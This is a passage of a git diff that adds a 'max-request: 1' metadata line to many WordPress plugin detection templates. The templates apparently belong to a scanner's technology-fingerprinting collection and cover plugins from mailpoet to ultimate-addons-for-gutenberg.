@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
+    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
+    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
+    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
+    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
+    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
+    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
+    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index bbc305b8de..3da2ea50e1 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
+    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
+    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
+    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
+    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
+    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
+    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
+    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
+    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
+    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 81f58198d3..1db1b57708 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
+    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
+    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index e085f30e5a..a038adac53 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
+    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
+    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
+    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
+    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
+    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
+    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
+    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
+    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
+    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
+    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 9555d7aebd..6bd95ec077 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
+    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 180266f448..1fd64a5279 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
+    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 17584cd064..1bb9a283ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
+    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
+    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
+    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
+    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
+    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
+    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
+    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
+    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
+    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
+    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
+    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
+    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
+    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
+    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
+    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
+    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
